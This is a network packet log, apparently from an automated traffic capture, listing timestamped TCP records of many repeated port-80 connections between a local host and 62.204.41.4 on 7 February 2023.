Feb 7, 2023 19:58:45.695127964 CET	80	50065	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:45.695298910 CET	50065	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.868510962 CET	50065	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.869215012 CET	50066	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.928667068 CET	80	50066	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:45.928864002 CET	50066	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.929274082 CET	50066	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.929873943 CET	80	50065	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:45.929975033 CET	50065	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.988683939 CET	80	50066	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:45.993290901 CET	80	50066	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:45.993392944 CET	50066	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.103471994 CET	50066	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.104155064 CET	50067	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.163372993 CET	80	50066	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.163505077 CET	50066	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.164633036 CET	80	50067	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.164773941 CET	50067	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.185178995 CET	50067	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.246654034 CET	80	50067	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.251833916 CET	80	50067	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.251990080 CET	50067	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.369604111 CET	50067	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.370486021 CET	50068	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.431653976 CET	80	50067	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.432974100 CET	80	50068	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.433111906 CET	50067	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.433149099 CET	50068	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.433814049 CET	50068	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.495095968 CET	80	50068	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.499658108 CET	80	50068	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.499840021 CET	50068	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.606091976 CET	50068	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.606913090 CET	50069	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.667680025 CET	80	50068	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.667844057 CET	50068	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.668193102 CET	80	50069	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.668298006 CET	50069	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.668672085 CET	50069	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.729867935 CET	80	50069	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.734369040 CET	80	50069	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.734658003 CET	50069	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.839694977 CET	50069	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.840336084 CET	50070	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.901882887 CET	80	50069	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.901917934 CET	80	50070	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.902205944 CET	50069	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.902295113 CET	50070	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.903603077 CET	50070	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:46.965965986 CET	80	50070	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.968796968 CET	80	50070	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:46.970546961 CET	50070	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.091340065 CET	50070	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.092108011 CET	50071	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.152040005 CET	80	50071	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.152848959 CET	80	50070	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.153083086 CET	50070	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.153403044 CET	50071	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.153403044 CET	50071	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.214135885 CET	80	50071	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.217680931 CET	80	50071	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.217890024 CET	50071	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.322164059 CET	50071	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.323580980 CET	50072	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.382524967 CET	80	50071	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.382702112 CET	50071	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.386337996 CET	80	50072	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.386461020 CET	50072	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.386919022 CET	50072	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.448458910 CET	80	50072	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.452110052 CET	80	50072	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.452287912 CET	50072	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.564197063 CET	50072	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.565823078 CET	50073	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.625698090 CET	80	50072	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.625768900 CET	50072	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.628541946 CET	80	50073	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.628710032 CET	50073	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.629160881 CET	50073	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.691679955 CET	80	50073	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.695662022 CET	80	50073	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.695854902 CET	50073	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.807909012 CET	50073	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.808867931 CET	50074	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.869467974 CET	80	50074	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.869690895 CET	50074	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.870198965 CET	50074	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.870301008 CET	80	50073	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.870419979 CET	50073	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:47.930671930 CET	80	50074	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.933940887 CET	80	50074	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:47.934104919 CET	50074	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.056168079 CET	50074	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.056794882 CET	50075	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.118666887 CET	80	50074	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.118755102 CET	80	50075	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.118845940 CET	50074	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.118911028 CET	50075	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.119365931 CET	50075	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.181003094 CET	80	50075	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.185590982 CET	80	50075	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.185730934 CET	50075	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.292334080 CET	50075	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.295260906 CET	50076	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.352845907 CET	80	50075	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.352936029 CET	50075	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.354887009 CET	80	50076	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.355046034 CET	50076	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.365767956 CET	50076	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.425244093 CET	80	50076	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.428767920 CET	80	50076	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.428854942 CET	50076	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.560964108 CET	50076	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.561958075 CET	50077	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.621438980 CET	80	50076	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.621988058 CET	50076	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.623969078 CET	80	50077	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.624145031 CET	50077	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.624594927 CET	50077	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.686677933 CET	80	50077	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.689368010 CET	80	50077	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.689532042 CET	50077	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.805764914 CET	50077	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.806482077 CET	50078	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.868535042 CET	80	50077	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.868659973 CET	50077	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.869360924 CET	80	50078	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.869472980 CET	50078	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.869935036 CET	50078	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:48.933047056 CET	80	50078	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.936019897 CET	80	50078	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:48.936125994 CET	50078	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.040649891 CET	50078	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.041367054 CET	50079	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.102937937 CET	80	50079	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.102996111 CET	80	50078	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.103136063 CET	50079	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.103421926 CET	50078	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.105142117 CET	50079	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.166790962 CET	80	50079	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.170850992 CET	80	50079	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.170950890 CET	50079	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.276140928 CET	50079	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.278139114 CET	50080	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.336774111 CET	80	50079	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.336846113 CET	50079	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.337907076 CET	80	50080	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.338002920 CET	50080	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.338342905 CET	50080	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.397478104 CET	80	50080	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.402851105 CET	80	50080	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.403002977 CET	50080	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.512351990 CET	50080	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.513324976 CET	50081	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.571743011 CET	80	50080	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.573221922 CET	50080	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.575124979 CET	80	50081	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.575335979 CET	50081	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.575685024 CET	50081	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.637383938 CET	80	50081	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.639643908 CET	80	50081	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.644684076 CET	50081	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.759644985 CET	50081	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.760730028 CET	50082	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.821506977 CET	80	50081	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.821593046 CET	50081	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.823251963 CET	80	50082	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.823348045 CET	50082	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.824851036 CET	50082	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:49.887552977 CET	80	50082	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.890588045 CET	80	50082	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:49.896114111 CET	50082	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.011616945 CET	50082	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.012403011 CET	50083	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.073041916 CET	80	50083	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.074368000 CET	80	50082	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.074516058 CET	50082	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.074970007 CET	50083	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.074970007 CET	50083	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.136631012 CET	80	50083	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.139771938 CET	80	50083	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.139986038 CET	50083	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.243942976 CET	50083	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.244774103 CET	50084	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.306189060 CET	80	50083	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.306543112 CET	80	50084	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.306680918 CET	50083	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.306724072 CET	50084	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.307277918 CET	50084	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.368498087 CET	80	50084	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.371098995 CET	80	50084	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.371395111 CET	50084	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.479150057 CET	50084	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.480773926 CET	50085	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.539726019 CET	80	50084	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.539840937 CET	50084	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.541117907 CET	80	50085	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.541213989 CET	50085	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.542001963 CET	50085	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.602861881 CET	80	50085	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.605951071 CET	80	50085	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.606143951 CET	50085	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.715924025 CET	50085	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.716713905 CET	50086	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.777684927 CET	80	50085	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.777831078 CET	80	50086	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.777842999 CET	50085	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.777925968 CET	50086	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.782617092 CET	50086	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.844907999 CET	80	50086	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.847079039 CET	80	50086	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:50.847268105 CET	50086	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.963073015 CET	50086	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:50.966229916 CET	50087	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.026988983 CET	80	50086	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.027110100 CET	50086	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.029484987 CET	80	50087	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.029619932 CET	50087	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.030172110 CET	50087	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.091700077 CET	80	50087	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.096081018 CET	80	50087	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.096235991 CET	50087	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.212658882 CET	50087	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.214174032 CET	50088	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.277926922 CET	80	50087	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.278063059 CET	50087	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.279936075 CET	80	50088	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.280092001 CET	50088	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.281256914 CET	50088	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.344166040 CET	80	50088	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.346573114 CET	80	50088	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.346792936 CET	50088	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.463221073 CET	50088	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.464387894 CET	50089	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.528862953 CET	80	50088	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.528965950 CET	50088	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.530802965 CET	80	50089	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.530908108 CET	50089	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.531271935 CET	50089	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.596004963 CET	80	50089	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.598530054 CET	80	50089	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.598645926 CET	50089	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.712904930 CET	50089	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.713795900 CET	50090	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.778817892 CET	80	50090	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.778970957 CET	50090	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.779078007 CET	80	50089	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.779145002 CET	50089	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.779335976 CET	50090	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.840918064 CET	80	50090	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.844306946 CET	80	50090	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:51.844434023 CET	50090	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.964029074 CET	50090	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:51.972172022 CET	50091	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.024586916 CET	80	50090	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.024712086 CET	50090	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.033580065 CET	80	50091	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.033708096 CET	50091	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.034089088 CET	50091	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.095680952 CET	80	50091	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.100209951 CET	80	50091	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.100296974 CET	50091	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.213124990 CET	50091	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.213753939 CET	50092	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.275542021 CET	80	50092	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.275645018 CET	50092	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.275892973 CET	80	50091	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.275975943 CET	50091	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.278297901 CET	50092	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.339077950 CET	80	50092	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.341474056 CET	80	50092	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.341555119 CET	50092	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.449780941 CET	50092	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.450633049 CET	50093	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.509654999 CET	80	50092	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.512142897 CET	50092	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.512320995 CET	80	50093	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.512950897 CET	50093	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.513267994 CET	50093	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.574640036 CET	80	50093	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.577141047 CET	80	50093	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.577272892 CET	50093	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.681776047 CET	50093	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.682471991 CET	50094	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.743275881 CET	80	50093	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.743721008 CET	80	50094	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.743887901 CET	50093	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.743927956 CET	50094	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.753336906 CET	50094	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.814776897 CET	80	50094	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.817672014 CET	80	50094	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.817774057 CET	50094	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.932183981 CET	50094	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.933171988 CET	50095	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.993717909 CET	80	50094	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.994806051 CET	80	50095	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:52.994973898 CET	50094	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:52.995060921 CET	50095	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.020937920 CET	50095	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.082628012 CET	80	50095	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.087100029 CET	80	50095	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.087471008 CET	50095	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.197586060 CET	50095	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.198491096 CET	50096	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.259978056 CET	80	50095	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.261002064 CET	50095	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.261718035 CET	80	50096	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.261831999 CET	50096	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.262317896 CET	50096	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.324496031 CET	80	50096	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.327903986 CET	80	50096	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.328066111 CET	50096	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.447129011 CET	50096	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.447902918 CET	50097	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.509152889 CET	80	50096	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.509701967 CET	80	50097	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.509879112 CET	50096	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.509960890 CET	50097	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.510976076 CET	50097	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.573564053 CET	80	50097	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.576929092 CET	80	50097	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.577016115 CET	50097	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.681490898 CET	50097	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.682137012 CET	50098	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.745059013 CET	80	50098	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.745093107 CET	80	50097	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.745253086 CET	50097	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.748512030 CET	50098	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.748512983 CET	50098	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.809139013 CET	80	50098	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.814133883 CET	80	50098	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.814274073 CET	50098	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.918667078 CET	50098	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.919238091 CET	50099	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.979288101 CET	80	50098	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.979454994 CET	50098	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.979574919 CET	80	50099	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:53.981070995 CET	50099	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:53.985605955 CET	50099	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.045923948 CET	80	50099	62.204.41.4	192.168.2.5
